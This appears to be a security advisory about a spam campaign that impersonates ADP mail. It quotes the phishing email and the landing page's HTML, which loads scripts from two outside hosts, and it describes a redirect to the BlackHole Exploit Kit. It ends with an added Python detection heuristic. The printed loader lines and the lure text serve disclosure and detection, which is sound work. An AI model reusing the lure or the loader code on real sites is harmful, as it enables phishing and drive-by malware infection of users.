Researchers at MX Lab have started to intercept a spam mail campaign that masquerades as ADP notification mail. The intercepted mails have subjects like "ADP Funding Notification" and "ADP Security Management Update".
The email is sent from the spoofed addresses ADPClientServices@adp.com, ADPClientServices@adp.com; the email address may vary.
The content of one of the intercepted spam mails:
Your Transaction Report(s) have been uploaded to the web site:
https://www.flexdirect.adp.com/client/login.aspx
Please note that your bank account will be debited within one banking
business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any
questions or comments, please Contact your ADP Benefits Specialist.
Thank You,
ADP Benefit Services

Once the user clicks the link provided in the spam mail, he is taken to a website which has the following script:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://cyberku.co.cc/s8XVniQE/js.js"></script>
<script type="text/javascript" src="hxxp://maccvision.com/vS5qA1sz/js.js"></script>
</html>

Both JavaScript files contain the same script, which redirects the browser to 'hxxp://216.119.142.129/view.php?s=7058dba9af062ccf'. The URL hosts the BlackHole Exploit Kit, which uses the plugin version 0.7.8 (the latest version of the BlackHole Exploit Kit).
The BlackHole Exploit Kit tries to take advantage of a vulnerability residing in the victim system. After successful exploitation, it downloads a malicious file called 'info.exe'. The detection ratio of this malware is 2/42 (VirusTotal).
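
For detection, the landing page in this campaign has a recognisable shape: almost no visible text, plus script tags that pull the same short-path js.js from unrelated hosts. The check below is an added example, not code from MX Lab or the original post; the path pattern, the 80-character threshold and the name score_landing_page are assumptions drawn from the single sample shown here.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Landing page as shown in the post (URLs kept defanged as hxxp).
SAMPLE = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://cyberku.co.cc/s8XVniQE/js.js"></script>
<script type="text/javascript" src="hxxp://maccvision.com/vS5qA1sz/js.js"></script>
</html>"""

# Constructed benign page for contrast (not from the post).
BENIGN = """<html><body><h1>Team wiki</h1><p>Some ordinary page text.</p>
<script src="https://cdn.example.com/lib/app.min.js"></script></body></html>"""

# Assumed heuristic, derived from the two sample URLs: /<8 alphanumerics>/js.js
LOADER_PATH = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")

class _Scan(HTMLParser):
    """Collects external script sources and visible (non-script) text."""
    def __init__(self):
        super().__init__()
        self.srcs, self.text, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:  # strip straight or typographic quotes left by copy/paste
                self.srcs.append(src.strip("\u201c\u201d\"'"))
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if not self._in_script and data.strip():
            self.text.append(data.strip())

def score_landing_page(html):
    """Flag near-empty pages loading look-alike js.js from 2+ distinct hosts."""
    scan = _Scan()
    scan.feed(html)
    # Re-fang only for parsing; nothing is fetched.
    urls = [urlsplit(re.sub(r"^hxxp", "http", s, flags=re.I)) for s in scan.srcs]
    hosts = sorted({u.hostname for u in urls if LOADER_PATH.match(u.path)})
    visible = len(" ".join(scan.text))
    return {"suspicious": len(hosts) >= 2 and visible < 80,
            "loader_hosts": hosts, "visible_chars": visible}
```

The same function can be run over HTML bodies captured by a web proxy or mail sandbox; the threshold and path pattern should be tuned against local traffic before alerting on them.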